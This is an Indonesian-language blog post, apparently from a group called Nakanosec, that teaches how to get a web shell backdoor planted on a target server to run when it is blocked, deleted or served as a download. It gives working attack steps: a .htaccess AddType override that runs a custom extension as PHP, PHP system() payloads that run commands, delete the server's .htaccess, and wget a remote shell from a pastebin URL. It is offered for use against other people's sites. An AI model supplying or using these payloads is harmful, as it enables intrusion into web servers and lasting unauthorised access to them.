Bypass Shell Backdoor (Terdownload, Forbidden, Terhapus)

   


Shell Backdoor adalah file yang ditanamkan oleh attacker ke server pada aktivitas hacking. Biasanya shell backdoor dibuat dengan format php atau asp, namun tidak menutup kemungkinan shell backdoor memiliki extensi yang lain. Shell backdoor sendiri punya beberapa fungsi, yaitu:

  • Mendapatkan akses lebih terhadap website
  • Sebagai jalur belakang hacker untuk masuk kembali (tanpa exploitasi ulang)
  • Meracuni website dengan code jahat agar terjadi kerusakan pada website

Dalam beberapa kasus saat kita ingin mengakses shell backdoor pada target, shell yang kita upload sering kali terdownload, nakanosec mempunyai beberapa teknik untuk bypass kasus ini yuk mulai

Mengatasi Shell Backdoor Yang Forbidden dan Terhapus
Ada beberapa penyebab shell backdoor forbidden atau terhapus, salah satunya adalah penggunaan filter dimana melakukan block pada script tertentu. Kasus ini dapat diatasi dengan menggunakan shell tmp atau marijuana. untuk source codenya seperti berikut

Tmp Shell Backdoor

Kalian bisa ubah url shell indoxploit dengan url shell kalian (dalam bentuk txt)


Marijuana Shell Backdoor


Baca juga: Bug PPPD Di Sistem Operasi Linux ,Hacker Mampu Melakukan Serangan Remote Code Execution (RCE)

Mengatasi Shell Backdoor Yang Terdownload
Selain Forbidden ada juga kasus shell yang terdownload saat diakses hal ini seringkali disebabkan oleh .htaccess namun ada juga yang memang tidak bisa dibypass seperti kasus dimana file terupload di aws ataupun didownload dengan script php. Berikut teknik teknik untuk bypass shell backdoor yang terdownload

 Bypass Shell Backdoor Dengan Override .htaccess

  • Buat file dengan nama .htaccess dengan isi sebagai berikut

AddType application/x-httpd-php .nakanosec

  •  Upload ke server target, jika tidak bisa terupload coba gunakan burp dan ganti ektensi
  • Siapkan Shell Marijuana dan rename menjadi Marijuana.nakanosec
  • Upload Shell Marijuana.nakanosec kemudian coba akses

 Bypass Shell Backdoor Dengan One Line Shell

  • Buat file nakanosec.php
  • Isi nakanosec.php dengan payload dibawah

<?php
system("id")
?>

  • Upload ke server target
  • Shell akan terdownload tapi command akan tereksekusi
  • Untuk upload shell remove dulu .htaccess dengan payload berikut 
<?php
system("rm .htaccess")
?>
  • kemudian untuk uploadnya gunakan payload berikut
<?php
system("wget https://pastebin.com/raw/tizUkMj9 -O nakanosec.php")
?> 

Mungkin itu saja untuk hari ini. Keep learn stay silent - Nakanosec

« Terbaru
Postingan Lebih Baru
Terlama »
Postingan Lama
Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.